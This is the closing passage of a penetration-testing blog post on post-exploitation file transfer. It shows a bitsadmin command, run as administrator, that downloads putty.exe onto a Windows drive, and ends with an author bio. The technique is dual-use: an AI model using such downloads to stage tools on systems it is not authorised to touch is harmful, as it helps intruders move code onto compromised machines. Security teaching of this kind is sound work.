From given below image you can observe we had successfully download putty.exe in d: drive.

Download file using BITSAdmin

BITSAdmin is command-line utility for window platform that allows user to downloading and uploading of a file. If you want to download any file from http then you can use following command. It is similar as PowerShell work under admin privileged. Therefore run cmd as administrator and execute given below command for downloading putty. 

bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe F:\putty.exe

Now it will start downloading and also gives updates while downloading such as job type i.e downloading, priority and status.

From given below image you can observe that we had downloaded putty.exe in f: drive.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Compressive Guide to File Transfer (Post Exploitation) appeared first on Hacking Articles.